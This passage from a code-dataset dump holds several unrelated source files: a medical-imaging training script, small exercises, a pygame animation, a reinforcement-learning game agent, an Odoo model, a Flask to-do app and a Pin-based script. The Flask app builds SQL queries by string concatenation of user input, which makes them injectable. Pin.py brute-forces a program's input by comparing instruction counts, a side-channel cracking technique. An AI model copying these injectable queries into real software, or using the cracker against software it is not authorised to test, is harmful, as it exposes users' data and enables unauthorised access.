get_list_of_patients('brats_data_preprocessed/Brats{}TrainingData'.format(str(args.brats_train_year)))\npatients = patients[0:args.training_max]\nprint(f\"The number of training patients: {len(patients)}\")\n\nbatch_size = args.batch_size\npatch_size = [args.patch_depth, args.patch_width, args.patch_height]\n\nif args.num_channels == 3:\n in_channels = ['t1c', 't2', 'flair']\n\nelif args.num_channels == 4:\n in_channels = ['t1', 't1c', 't2', 'flair']\n\n\n#%%\n# num_splits=5 means 1/5th is validation data!\npatients_train, patients_val = get_split_deterministic(patients, fold=0, num_splits=5, random_state=args.seed)\n\nif not args.use_validation:\n patients_train = patients\n\n#%%\ntrain_dl = BRATSDataLoader(\n patients_train,\n batch_size=batch_size,\n patch_size=patch_size,\n in_channels=in_channels\n)\n\nval_dl = BRATSDataLoader(\n patients_val,\n batch_size=batch_size,\n patch_size=patch_size,\n in_channels=in_channels\n)\n#%%\n\nif args.aggro_da:\n print(\"Aggro DA\")\n tr_transforms = get_train_transform_aggro(patch_size)\n\n\nelse:\n print(\"Not aggro DA\")\n #tr_transforms = get_train_transform(patch_size, noise=\"Riccian\")\n tr_transforms = get_train_transform(patch_size)\n\n\n\n# finally we can create multithreaded transforms that we can actually use for training\n# we don't pin memory here because this is pytorch 
specific.\ntr_gen = MultiThreadedAugmenter(train_dl, tr_transforms, num_processes=4, # num_processes=4\n num_cached_per_queue=3,\n seeds=None, pin_memory=False)\n# we need less processes for vlaidation because we dont apply transformations\nval_gen = MultiThreadedAugmenter(val_dl, None,\n num_processes=max(1, 4 // 2), # num_processes=max(1, 4 // 2)\n num_cached_per_queue=1,\n seeds=None,\n pin_memory=False)\n\n#%%\ntr_gen.restart()\nval_gen.restart()\n\n#%%\nif args.multi_class:\n num_classes = 4\nelse:\n num_classes = 1\n\n\nif args.num_channels == 3:\n print(\"Original Albunet3D\")\n net_3d = AlbuNet3D34(num_classes=num_classes, pretrained=args.pretrained, is_deconv=True)\n\nelif args.num_channels == 4:\n print(\"4 channel Albunet3D\")\n print(f\"Initialize weights status: {args.weight_init}\")\n net_3d = AlbuNet3D34_4channels(num_classes=num_classes, pretrained=args.pretrained, is_deconv=True,updated=args.weight_init)\n\n\n\n#%%\nloss_fn = GeneralizedDiceLoss() if args.multi_class else SimpleDiceLoss()\nmetric = dice_multi_class if args.multi_class else dice\n\n# print(f\"Training batch size is: {args.training_batch_size}\")\n# print(f\"Validation batch size is: {args.validation_batch_size}\")\nprint(f\"Training for {args.epochs} epochs\")\n\nmodel_trainer = ModelTrainer(args.name, net_3d, tr_gen, val_gen, loss_fn, metric,\n lr=args.learning_rate, epochs=args.epochs,\n num_batches_per_epoch=args.training_batch_size, num_validation_batches_per_epoch=args.validation_batch_size,\n use_gpu=args.use_gpu, multi_class=args.multi_class) \n\n\nmodel_trainer.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"458004085","text":"class Solution1:\n def isPalindrome(self, x):\n if x < 0:\n return False\n elif x == 0:\n return True\n else:\n old = x\n target = 0\n while old > 0:\n target = target * 10 + old % 10\n old = old // 10\n return target == x\n\ns = Solution1()\narr = [121,-121,1,22,345,10]\nfor i in range(0,len(arr)):\n print(s.isPalindrome(arr[i]))","sub_path":"src/session1/q009_palindrome_number/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"225212368","text":"#!/bin/env/python\nimport pygame\nfrom pygame.locals import *\nimport shapes_center\nimport sys\nimport math\n\ndef get_pos(degree, radius, xCenter, yCenter):\n assert degree <= 360.0 # not needed mathmatically.\n theta = math.radians(degree)\n #r = radius * math.cos(n * theta)\n r = radius * math.tan(1*theta)\n x = xCenter + r * (math.cos(theta) + math.tan(theta) )\n y = yCenter + r * (math.sin(theta) - math.tan(3*theta) )\n\n# x = xCenter + math.cos(x) * math.cos(y) * radius\n# y = yCenter + math.sin(x) * math.sin(y) * radius\n\n if x < -200: x = -200\n if x > 2000: x = 2000\n if y > 1500: y = 1500\n if y < -200: y = -200\n\n return ( int(x), int(y))\n\ndef main(resolution, fullscreen=False, num_objects=24, radius=300):\n #radius = int (9.0 * float(resolution[1] / num_circles))\n res_x_half = resolution[0] / 2\n res_y_half = resolution[1] / 2\n # start everything\n pygame.init()\n if fullscreen:\n screen = pygame.display.set_mode(resolution, FULLSCREEN)\n else:\n screen = pygame.display.set_mode(resolution, DOUBLEBUF)\n pygame.mouse.set_visible(False)\n pygame.display.set_caption(\"squares\")\n\n # start everything else\n clock = pygame.time.Clock()\n 
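# Worked numbers for the loop below, using the constants set just under this line:\n    # degree_step = 0.05 means the while-loop runs 360.0 / 0.05 = 7200 frames, and at\n    # clock_tick = 30 frames/s that is 7200 / 30 = 240 s, i.e. one roughly four-minute cycle.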
count = 0\n clock_tick = 30\n degrees = [0.0] * num_objects # array_fill\n degree_step = 0.05\n c1 = pygame.color.Color(\"red\")\n c2 = pygame.color.Color(\"white\")\n while count < 360.0/degree_step:\n clock.tick(clock_tick)\n\n for event in pygame.event.get():\n if event.type == QUIT or event.type == KEYDOWN:\n pygame.quit(); sys.exit();\n\n screen.fill(c1)\n\n# pygame.draw.circle(screen, white, (res_x_half, res_y_half), radius, 1)\n\n for i in range(num_objects):\n r = (i+1) * 5\n pos = get_pos(degrees[i], radius, res_x_half, res_y_half)\n pos2 = (pos[0]+2, pos[1]+2)\n #pygame.draw.circle(screen, pygame.color.Color(\"blue\"), pos, r, 2)\n #pygame.draw.circle(screen, pygame.color.Color(\"green\"), pos2, r, 2)\n #shapes_center.square(screen, pygame.color.Color(\"green\"), pos, r, 2)\n #shapes_center.square(screen, pygame.color.Color(\"green\"), pos, r/2, 2)\n #shapes_center.octagon(screen, pygame.color.Color(\"yellow\"), pos, r, 2)\n shapes_center.hexagon(screen, c2, pos, r, 5)\n\n pygame.display.update()\n\n # want to pause when circle 0 is at a multiple of 30deg\n # count x 20 = 1 degree ; 20 * 30 = 600\n# if count % (20 * clock_tick) == 0:\n# pygame.time.delay(1000)\n# count += 1\n\n\n for i in range(num_objects):\n degrees[i] += float(i+1) * degree_step\n if degrees[i] > 360.0: degrees[i] -= 360.0\n count += 1\n if count % 3 == 0:\n t = c1\n c1 = c2\n c2 = t\n\nif __name__ == '__main__':\n #main(resolution=(1024,768), fullscreen=True, num_objects=24, radius=240)\n #main(resolution=(1440,900), fullscreen=False, num_objects=24, radius=320)\n main(resolution=(1920,1024), fullscreen=True, num_objects=24, radius=280)\n","sub_path":"python/graphics/square-05.py","file_name":"square-05.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"530072884","text":"from collections import defaultdict\nfrom Matchmaster import Matchmaster\nfrom operator import itemgetter\nfrom Player import Player\nimport itertools\nimport os\nimport os.path\nimport sys\nimport traceback\n\nclass Gamemaster():\n def __init__(self, iterations):\n self.players = {}\n self.player_ids = []\n self.matches = []\n self.overall_points = defaultdict(int)\n self.iterations = iterations\n self.match_results = []\n\n def add_player(self, player_id, source_code):\n self.players[player_id] = Player(player_id=player_id, source_code=source_code)\n self.player_ids.append(int(player_id))\n\n def generate_matches(self):\n combinations = itertools.combinations(self.player_ids, 2)\n for pair in combinations:\n self.matches.append(pair)\n self.matches = self.matches * 1\n\n def start_tournament(self):\n for match in self.matches:\n # print '----- Match between ', match, ' begins -----'\n matchmaster = self.start_match(match)\n\n points = matchmaster.points\n\n outcome = zip(match, points)\n\n for player_id, pts in outcome:\n self.overall_points[player_id] += pts\n # print 'The Score was ', outcome\n # print '----- Match between ', match, ' ended -----'\n\n self.match_results.append(matchmaster.get_match_data())\n\n def start_match(self, match):\n matchmaster = Matchmaster(player_1=self.players[match[0]],\n player_2=self.players[match[1]],\n iterations=self.iterations)\n # try:\n matchmaster.start_match()\n # except InvalidActionError as e:\n # self.overall_points[e.player_id] += 1000\n # print e.player_id, 'returned an invalid action!'\n # except Exception as e:\n # self.handle_match_error(match)\n\n return matchmaster\n\n # def 
handle_match_error(self, match):\n # tb = sys.exc_info()[2]\n # stack = traceback.extract_tb(tb)\n # crasher = None\n # for s in stack:\n # print s\n # if s[2] == 'decide':\n # crasher = s\n # if crasher:\n # crasher = os.path.splitext(os.path.basename(crasher[0]))[0]\n # print crasher, ' Crashed!'\n # player_id = int(crasher)\n # self.overall_points[player_id] += 1000\n # else:\n # print \"Match crashed, but unable to determine crasher\"\n\n def get_overall_points(self):\n return sorted(self.overall_points.iteritems(), key=itemgetter(1), reverse=True)\n\n def get_winner(self):\n return max(self.overall_points, key=lambda k: self.overall_points[k])\n\n def get_match_results(self):\n return self.match_results","sub_path":"tourney/Gamemaster.py","file_name":"Gamemaster.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"199226314","text":"# -*- coding:utf-8 -*-\nfrom flask import Flask, request, render_template, url_for, session, jsonify, redirect, json, make_response\nfrom flaskext.mysql import MySQL\nfrom flask_sslify import *\nimport lepl.apps.rfc3696\nimport json\nimport os\nfrom passlib.hash import pbkdf2_sha256\nfrom jinja2 import utils\nfrom datetime import datetime\n\ntmp_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')\nemail_validator = lepl.apps.rfc3696.Email()\nmysql = MySQL()\napp = Flask(__name__, template_folder=tmp_dir)\nsslify = SSLify(app)\napp.config.from_pyfile('my.cfg')\nmysql.init_app(app)\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\n\n\n@app.route(\"/\")\ndef top():\n return render_template(\"top.html\")\n\n\n@app.route(\"/register\", methods=['POST'])\ndef register():\n from flask import request\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n email = str(utils.escape(request.json['email']))\n password = pbkdf2_sha256.hash(request.json['pass'])\n if len(name) != 0 and len(email) != 0 and len(password) != 0:\n if email_validator(email):\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM User WHERE username = '\" + name + \"'\")\n data = cursor.fetchone()\n if data is None:\n cursor.execute('INSERT INTO User(username,email,password) VALUES(%s,%s,%s)',\n [name, email, password])\n conn.commit()\n return \"登録できました!\"\n else:\n return \"すでに同じユーザーネームのユーザーが存在します\"\n else:\n return \"正しいメールアドレスではありません\"\n else:\n return \"空のフィールドが存在します\"\n\n\n@app.route(\"/login\")\ndef login():\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n session.pop('username', None)\n session.pop('msg', None)\n return redirect(url_for('login'))\n\n\n@app.route(\"/index\")\ndef index():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/auth\", methods=['POST'])\ndef auth():\n from flask import request\n if request.method == 'POST':\n name = str(utils.escape(request.form['name']))\n password = request.form['password']\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM User WHERE username = '\" + name + \"'\")\n data = cursor.fetchone()\n if data is None:\n error = \"登録されていないユーザーです\"\n session['msg'] = error\n return redirect(url_for('login'))\n else:\n if pbkdf2_sha256.verify(password, data[2]) is True:\n session['username'] = name\n return redirect(url_for('index'))\n else:\n error = \"ユーザーネームまたはパスワードが間違っています\"\n session['msg'] = error\n return 
redirect(url_for('login'))\n\n\n@app.route(\"/add\")\ndef add():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"add.html\")\n\n\n@app.route(\"/taskadd\", methods=['POST'])\ndef taskadd():\n from flask import request\n if request.method == 'POST':\n name = str(utils.escape(session['username']))\n title = str(utils.escape(request.json['title']))\n contents = str(utils.escape(request.json['contents']))\n level = request.json['level']\n period = request.json['period']\n period = period.split(\" - \")\n status = request.json[\"status\"]\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + name + \"'AND title ='\" + title + \"'\")\n data = cursor.fetchone()\n if data is None:\n cursor.execute('INSERT INTO Task (username,title,contents,startp,endp,level,status) '\n 'VALUES(%s,%s,%s,%s,%s,%s,%s)', [name, title, contents, period[0], period[1], level, status])\n conn.commit()\n return \"タスクを登録しました!タスク一覧から確認してください!\"\n else:\n return \"タスク一覧または完了済みタスク一覧に同じタイトルのタスクが存在します\"\n\n\n@app.route(\"/request\", methods=['GET'])\ndef request():\n from flask import jsonify, session\n name = str(utils.escape(session['username']))\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + name + \"'AND status = 'on'\")\n data = cursor.fetchall()\n cursor.close()\n return jsonify(data)\n\n\n@app.route(\"/update\", methods=['POST'])\ndef update():\n from flask import request, jsonify\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n title = str(utils.escape(request.json['title']))\n status = request.json[\"status\"]\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE \"\n \"Task SET status ='\" + status + \"'WHERE username ='\" + name + \"'AND title ='\" + title + \"'\")\n conn.commit()\n return \"タスクは完了しました\"\n\n\n@app.route(\"/calendar\")\ndef calendar():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"calendar.html\")\n\n\n@app.route(\"/tasklist\", methods=['GET'])\ndef tasklist():\n from flask import jsonify, session\n name = str(utils.escape(session['username']))\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + name + \"'AND status = 'on'\")\n data = cursor.fetchall()\n response = []\n for value in range(len(data)):\n start = data[value][3]\n end = data[value][4]\n level = data[value][5]\n if level == \"最重要\":\n bgcolor = \"#dd4b39\"\n bodercolor = \"#dd4b39\"\n elif level == \"重要\":\n bgcolor = \"#f39c12\"\n bodercolor = \"#f39c12\"\n else:\n bgcolor = \"#3c8dbc\"\n bodercolor = \"#3c8dbc\"\n\n start = start.split(\"/\")\n end = end.split(\"/\")\n response.append({\n \"title\": data[value][1],\n \"start\": start[2] + \"-\" + start[0] + \"-\" + start[1],\n \"end\": end[2] + \"-\" + end[0] + \"-\" + end[1],\n \"backgroundColor\": bgcolor,\n \"borderColor\": bodercolor\n })\n cursor.close()\n return jsonify(response)\n\n\n@app.route(\"/completed\")\ndef completed():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"complete.html\")\n\n\n@app.route(\"/complist\", methods=['GET'])\ndef complist():\n from flask import jsonify, session\n name = str(utils.escape(session['username']))\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + name + \"'AND status = 'off'\")\n data = 
cursor.fetchall()\n return jsonify(data)\n\n\n@app.route(\"/remove\", methods=['POST'])\ndef remove():\n from flask import request, jsonify\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n title = str(utils.escape(request.json['title']))\n print(title)\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM Task WHERE username ='\" + name + \"'AND title ='\" + title + \"'\")\n conn.commit()\n return \"タスクは削除されました\"\n\n\n@app.route(\"/setting\")\ndef setting():\n if 'username' not in session:\n return redirect(url_for('top'))\n else:\n return render_template(\"setting.html\")\n\n\n@app.route(\"/register_endpoint\", methods=['POST'])\ndef register_endpoint():\n from flask import request, jsonify\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n state = str(request.json['state'])\n endpoint = request.json['endpoint']\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE User SET \"\n \"push_endpoint ='\" + endpoint + \"',push_state ='\" + state + \"' WHERE username ='\" + name + \"'\")\n conn.commit()\n return \"OK\"\n\n\n@app.route(\"/user_state\", methods=['GET'])\ndef user_state():\n name = str(utils.escape(session['username']))\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM User WHERE username = '\" + name + \"'\")\n data = cursor.fetchall()\n return jsonify(data)\n\n\n@app.route(\"/update_state\", methods=['POST'])\ndef update_state():\n from flask import request, jsonify\n if request.method == 'POST':\n name = str(utils.escape(request.json['name']))\n state = str(request.json['state'])\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE User SET push_state ='\" + state + \"' WHERE username ='\" + name + \"'\")\n conn.commit()\n return \"OK\"\n\n\n@app.route(\"/fetch\", methods=['POST'])\ndef fetch():\n from flask import request, jsonify\n if request.method == 'POST':\n endpoint = request.json['end_point']\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM User WHERE push_endpoint = '\" + endpoint + \"' AND push_state = 'True'\")\n data = cursor.fetchall()\n cursor.execute(\"SELECT * FROM Task WHERE username = '\" + data[0][0] + \"' AND status = 'on'\")\n push_data = cursor.fetchall()\n today_do = []\n today_do_str = \"\"\n any_do = []\n any_do_str = \"\"\n d = datetime.today()\n year = int(d.year)\n month = int(d.month)\n day = int(d.day)\n date = datetime(year, month, day)\n for i in range(len(push_data)):\n date2 = push_data[i][4].split(\"/\")\n date2 = datetime(int(date2[2]), int(date2[0]), int(date2[1]))\n if date2 == date:\n today_do.append(\"・\" + push_data[i][1] + \"\\n\")\n today_do_str += \"・\" + push_data[i][1] + \"\\n\"\n else:\n any_do.append(\"・\" + push_data[i][1] + \"\\n\")\n any_do_str += \"・\" + push_data[i][1] + \"\\n\"\n\n if len(push_data) != 0:\n data = {\n \"title\": \"ToDo\",\n \"body\": \"[今日が締め切りのタスク\" + str(len(today_do)) + \"件]\\n\" +\n today_do_str + \"[締め切り外のタスク\" + str(len(any_do)) + \"件]\\n\" + any_do_str,\n \"url\": \"https://todo.ydsteins.tk/login\"\n }\n return jsonify(data)\n else:\n data = {\n \"title\": \"ToDo\",\n \"body\": \"まずはタスクを登録してみましょう!\",\n \"url\": \"https://todo.ydsteins.tk/login\"\n }\n return jsonify(data)\n\nif __name__ == \"__main__\":\n 
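# A hardening sketch, not part of the original app: most handlers above splice user input\n# straight into SQL strings, which is open to injection; the same cursor API already used in\n# register() accepts placeholders instead, e.g.\n#   cursor.execute(\"SELECT * FROM User WHERE username = %s\", (name,))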
app.run(debug=app.config['DEBUG'])\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632007276","text":"import _plotly_utils.basevalidators\n\n\nclass LabelValidator(_plotly_utils.basevalidators.CompoundValidator):\n def __init__(self, plotly_name=\"label\", parent_name=\"layout.newshape\", **kwargs):\n super(LabelValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop(\"data_class_str\", \"Label\"),\n data_docs=kwargs.pop(\n \"data_docs\",\n \"\"\"\n font\n Sets the new shape label text font.\n padding\n Sets padding (in px) between edge of label and\n edge of new shape.\n text\n Sets the text to display with the new shape.\n textangle\n Sets the angle at which the label text is drawn\n with respect to the horizontal. For lines,\n angle \"auto\" is the same angle as the line. For\n all other shapes, angle \"auto\" is horizontal.\n textposition\n Sets the position of the label text relative to\n the new shape. Supported values for rectangles,\n circles and paths are *top left*, *top center*,\n *top right*, *middle left*, *middle center*,\n *middle right*, *bottom left*, *bottom center*,\n and *bottom right*. Supported values for lines\n are \"start\", \"middle\", and \"end\". Default:\n *middle center* for rectangles, circles, and\n paths; \"middle\" for lines.\n xanchor\n Sets the label's horizontal position anchor\n This anchor binds the specified `textposition`\n to the \"left\", \"center\" or \"right\" of the label\n text. For example, if `textposition` is set to\n *top right* and `xanchor` to \"right\" then the\n right-most portion of the label text lines up\n with the right-most edge of the new shape.\n yanchor\n Sets the label's vertical position anchor This\n anchor binds the specified `textposition` to\n the \"top\", \"middle\" or \"bottom\" of the label\n text. 
For example, if `textposition` is set to\n *top right* and `yanchor` to \"top\" then the\n top-most portion of the label text lines up\n with the top-most edge of the new shape.\n\"\"\",\n ),\n **kwargs,\n )\n","sub_path":"contrib/python/plotly/py3/plotly/validators/layout/newshape/_label.py","file_name":"_label.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"219439841","text":"import numpy as np\r\nimport pickle\r\nfrom settings import e\r\nfrom settings import s\r\nfrom random import shuffle\r\nfrom agent_code.my_agent.feature_extraction import *\r\nfrom agent_code.my_agent.algorithms import new_reward, q_gd_linapprox\r\n\r\n\r\n#########################################################################\r\n\r\ndef setup(self):\r\n \r\n self.actions = [ 'UP', 'DOWN', 'LEFT', 'RIGHT', 'BOMB', 'WAIT' ]\r\n #self.train_mode = \"Greed_batch_test\"\r\n self.init_mode = \"handpicked_init\"\r\n #self.init_mode = 'init1'\r\n self.alpha_set = \"const0.2\"\r\n # load weights\r\n try:\r\n self.weights = np.load('agent_code/my_agent/models/.npy')\r\n #self.training_weights = np.load('train_weights_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set))\r\n #self.training_rewards = np.load('train_rewards_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set))\r\n print(\"weights loaded\")\r\n except:\r\n self.weights = []\r\n self.training_weights = []\r\n self.training_rewards = []\r\n print(\"no weights found ---> create new weights\")\r\n\r\n # Define Rewards\r\n self.total_R = 0\r\n self.reward_round = 0\r\n \r\n # Step size or gradient descent \r\n self.alpha = 0.2\r\n self.gamma = 0.95\r\n self.EPSILON = 0.2\r\n self.round = 1\r\n \r\n self.history = []\r\n \r\n \r\n#####################################################################\r\n\r\ndef act(self):\r\n \r\n \r\n \"\"\"\r\n actions order: 'UP', 'DOWN', LEFT', 'RIGHT', 'BOMB', 'WAIT' \r\n \"\"\"\r\n \r\n # load state \r\n game_state = self.game_state \r\n #print(\"step {}\".format(game_state['step']))\r\n\r\n # Compute features state \r\n F = RLFeatureExtraction(self.game_state)\r\n feature_state = F.state()\r\n self.prev_state = feature_state\r\n \r\n #different initial guesses can be defined here: \r\n if len(self.weights) == 0:\r\n print('no weights, init weights')\r\n if self.init_mode == 'handpicked_init':\r\n self.weights = np.array([-15, 1.5, -81, -2, 10, -1, 3.5, 1.7, 0.8, 0.8, 1.5, 2, 13, -10, 2, 2])\r\n elif self.init_mode == 'init1':\r\n self.weights = np.ones(feature_state.shape[1]) \r\n elif self.init_mode == 'initRand':\r\n self.weights = np.random.rand(self.prev_state.shape[1])\r\n \r\n #print(self.weights)\r\n self.logger.info('Pick action')\r\n \r\n # Linear approximation approach\r\n q_approx = np.dot(feature_state, self.weights) \r\n best_actions = np.where(q_approx == np.max(q_approx))[0] \r\n shuffle(best_actions)\r\n\r\n q_next_action = self.actions[best_actions[0]] #GREEDY POLICY\r\n self.next_action = q_next_action\r\n self.prev_action = self.next_action\r\n \r\n #print(\"q action picked \", q_next_action)\r\n \r\n \r\n#####################################################################\r\n\r\ndef reward_update(self):\r\n\r\n self.logger.info('IN TRAINING MODE ')\r\n if self.game_state['step']>1:\r\n #print('LEARNING')\r\n \r\n reward = new_reward(self.events)\r\n self.total_R += reward \r\n self.reward_round += reward\r\n \r\n hist_entry = {'state': self.prev_state, 'action': 
self.prev_action, 'reward':reward}\r\n        self.history.append(hist_entry)\r\n\r\n        #print(hist_entry)\r\n\r\n#####################################################################\r\n\r\ndef end_of_episode(self):\r\n\r\n    print(\"end of round {}\".format(self.round))\r\n    self.round += 1\r\n    # reset alpha for the next round\r\n    self.alpha = 0.2\r\n\r\n    ## calculate new rewards\r\n    reward = new_reward(self.events)\r\n    self.total_R += reward\r\n    self.reward_round += reward\r\n\r\n    hist_entry = {'state': self.prev_state, 'action': self.prev_action, 'reward': reward}\r\n    self.history.append(hist_entry)\r\n\r\n    ################ LEARNING\r\n\r\n    print('total reward from this round: {}'.format(self.reward_round))\r\n    print('total r: {}'.format(self.total_R))\r\n    self.reward_round = 0\r\n\r\n    # size the accumulator to the weight vector (16 entries for the handpicked init above),\r\n    # rather than a hard-coded 14, which would break the element-wise update below\r\n    temp_weights = np.zeros(len(self.weights))\r\n\r\n    for i in range(len(self.history)-1):\r\n\r\n        weights = self.weights\r\n        prev_state = self.history[i]['state']\r\n        prev_action = self.history[i]['action']\r\n        next_state = self.history[i+1]['state']\r\n        next_action = self.history[i+1]['action']\r\n\r\n        prev_sa = prev_state[self.actions.index(prev_action),:]\r\n        next_sa = next_state[self.actions.index(next_action),:]\r\n\r\n        temp = (reward + self.gamma * np.dot(next_sa,weights) - np.dot(prev_sa,weights)) * (np.dot(prev_sa,weights)-np.dot(next_sa, weights))* weights\r\n\r\n        temp_weights += temp\r\n\r\n    temp_weights = (-self.alpha) * (temp_weights/len(self.history))\r\n    # use self.weights here so the print also works when the loop above did not run\r\n    print('new weights = {}'.format(self.weights + temp_weights))\r\n    self.weights += temp_weights\r\n    self.weights /= np.sum(self.weights)\r\n\r\n    ############## SAVING LEARNING FROM ONE EPISODE\r\n    #np.save('weights_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set), self.weights)\r\n\r\n    self.training_weights = np.append(self.training_weights, self.weights)\r\n    #np.save('train_weights_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set), self.training_weights)\r\n\r\n    self.training_rewards = np.append(self.training_rewards, self.total_R)\r\n    #np.save('train_rewards_{}_{}_{}.npy'.format(self.train_mode, self.init_mode, self.alpha_set), self.training_rewards)\r\n\r\n\r\n    ################# RESET PARAMETERS FOR NEXT ROUND\r\n    if self.round%10 == 0:\r\n        self.total_R = 0\r\n\r\n","sub_path":"agent_code/MR_Bombastic/residual_weights/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"123560550","text":"from multiprocessing.pool import Pool\nfrom multiprocessing import cpu_count\nimport subprocess\nimport sys\nfrom config import PIN, MAX_NUM, MIN_NUM\n\n\ndef call_proc(cmd):\n    \"\"\" This runs in a separate thread. 
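In practice each call executes in a multiprocessing.Pool worker process (see Pin.run_pin below);\n    it blocks until cmd finishes and returns the (stdout, stderr) byte pair from Popen.communicate().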
\"\"\"\n # subprocess.call(shlex.split(cmd)) # This will block until cmd finishes\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = p.communicate()\n return (out, err)\n\n\nclass Pin(object):\n def __init__(self, INSCOUNT, filename, target_addr):\n self.filename = filename\n self.result = ''\n self.INSCOUNT = INSCOUNT\n self.target_addr = str(int(target_addr, 16))\n\n def run_pin(self, args):\n pool = Pool(cpu_count()) #获取cpu个数\n results = []\n for each_args in args:\n command = 'echo {} | {} -t {} -a {} -- {}'.format(each_args[1], PIN, self.INSCOUNT, self.target_addr,\n self.filename)\n result = pool.apply_async(call_proc, (command,))\n results.append((each_args[0], each_args[1], result))\n deal_result = []\n # io流最后处理\n for each in results:\n out, err = each[2].get()\n count = int(out.decode().split(\"Count:\")[1], 10)\n deal_result.append([each[0], each[1], count])\n pool.close()\n pool.join()\n diff = deal_result[0][2]\n for i in deal_result:\n i.append(i[2] - diff)\n self.result = deal_result\n\n def get_all_result(self):\n return self.result\n\n def get_equal(self, diff):\n for each in self.result:\n if each[3] == diff:\n return each[0]\n print(\"Not found equal\")\n sys.exit(0)\n\n def get_unequal(self, diff):\n for each in self.result:\n if each[3] != diff:\n return each[0]\n print(\"Not found unequal\")\n sys.exit(0)\n\n def get_below(self, diff):\n for each in self.result:\n if each[3] <= diff:\n return each[0]\n print(\"Not found below\")\n sys.exit(0)\n\n def get_after(self, diff):\n for each in self.result:\n if each[3] >= diff:\n return each[0]\n print(\"Not found after\")\n sys.exit(0)\n\n def get_min(self):\n min_num = MAX_NUM\n index = self.result[0][0]\n for each in self.result:\n if each[3] <= min_num:\n min_num = each[3]\n index = each[0]\n return index\n\n def get_max(self):\n max_num = MIN_NUM\n index = self.result[0][0]\n for each in self.result:\n if each[3] >= max_num:\n max_num = each[3]\n index = each[0]\n return index\n\n def get_diff(self):\n num = []\n charset = []\n for i in self.result:\n num.append(i[3])\n charset.append(i[0])\n temp = [elem for elem in num if num.count(elem) == 1]\n return charset[num.index(temp[0])]\n","sub_path":"Pin.py","file_name":"Pin.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"251100306","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n state = fields.Selection(\n selection_add=[('preorder', \"Pre-order\")]\n )\n ad_po_date = fields.Datetime(\n string=\"Estimated delivery date\",\n default=lambda self: fields.Datetime.now()\n )\n collection_id = fields.Many2one(\n comodel_name=\"product.collection\",\n string=\"Collection\"\n )\n preorder_complete = fields.Boolean(\n string=\"Pre-order Processed\",\n )\n is_preorder = fields.Boolean(\n string=\"Is a Pre-Order\"\n )\n\n @api.onchange('ad_po_date')\n def _set_date(self):\n if self.ad_po_date:\n self.requested_date = self.ad_po_date\n\n @api.multi\n def set_pre_order(self):\n if self.collection_id and self.ad_po_date:\n self.commitment_date = self.ad_po_date\n self.is_preorder = True\n self.action_confirm()\n else:\n raise ValidationError(\n \"Fields Collection and Estimated delivery \"\n \"date on the tab Pre-Order needs to be filled in \"\n 
